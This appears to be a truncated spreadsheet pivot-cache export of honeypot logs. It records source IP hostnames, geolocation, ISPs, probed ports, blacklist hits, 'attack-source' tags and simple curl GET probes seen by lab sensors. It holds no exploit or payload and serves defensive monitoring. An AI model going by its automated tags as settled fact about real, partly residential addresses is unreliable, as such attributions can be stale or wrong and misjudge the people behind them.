    <d v="2025-04-01T16:58:57"/>
    <d v="2025-03-13T02:46:07"/>
    <d v="2025-04-01T16:58:57"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:57ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3722"/>
    <x v="3722"/>
    <s v="59-126-217-3.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:57:19"/>
    <d v="2024-09-01T14:58:00"/>
    <d v="2025-04-01T16:57:19"/>
    <n v="2761"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;6907&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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3b7e:d903"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3723"/>
    <x v="3723"/>
    <s v="122-117-38-20.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:54:57"/>
    <d v="2024-01-25T13:06:59"/>
    <d v="2025-04-01T16:54:57"/>
    <n v="1061"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;8752&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7a75:2614"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3724"/>
    <x v="3724"/>
    <s v="125-229-237-151.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:54:01"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T16:54:01"/>
    <n v="449"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_DNS_H18&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;6226&amp;&amp;23&amp;&amp;53043&amp;&amp;56895&amp;&amp;NA&amp;&amp;9100&amp;&amp;4598"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:ed97"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3725"/>
    <x v="3725"/>
    <s v="220-134-253-147.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:53:14"/>
    <d v="2023-11-26T07:50:56"/>
    <d v="2025-04-01T16:53:14"/>
    <n v="753"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;30660&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc86:fd93"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3726"/>
    <x v="3726"/>
    <s v="125-229-210-141.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:52:04"/>
    <d v="2023-07-27T18:10:05"/>
    <d v="2025-04-01T16:52:04"/>
    <n v="1480"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;22&amp;&amp;62727&amp;&amp;23&amp;&amp;48788&amp;&amp;5978&amp;&amp;43484&amp;&amp;80&amp;&amp;39219"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de5:d28d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3727"/>
    <x v="3727"/>
    <s v="220-133-67-211.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:49:43"/>
    <d v="2024-12-17T12:36:22"/>
    <d v="2025-04-01T16:49:43"/>
    <n v="254"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;45035&amp;&amp;45046&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc85:43d3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3728"/>
    <x v="3728"/>
    <s v="59-126-114-190.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:49:40"/>
    <d v="2024-04-13T11:18:50"/>
    <d v="2025-04-01T16:49:40"/>
    <n v="434"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="80&amp;&amp;30891&amp;&amp;23&amp;&amp;9100&amp;&amp;56910&amp;&amp;29973&amp;&amp;56925&amp;&amp;56941&amp;&amp;52624&amp;&amp;52596&amp;&amp;52671"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:72be"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3729"/>
    <x v="3729"/>
    <s v="118-170-200-52.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:43:27"/>
    <d v="2024-12-28T01:41:45"/>
    <d v="2025-04-01T16:43:27"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2007-10-04"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL: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76aa:c834"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3730"/>
    <x v="3730"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:42:41"/>
    <d v="2025-04-01T04:50:05"/>
    <d v="2025-04-01T16:42:41"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:4c6c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3731"/>
    <x v="3731"/>
    <s v="125-228-157-93.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T16:42:41"/>
    <d v="2023-07-25T04:19:47"/>
    <d v="2025-04-01T16:42:41"/>
    <n v="2136"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_HTTP_H45&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_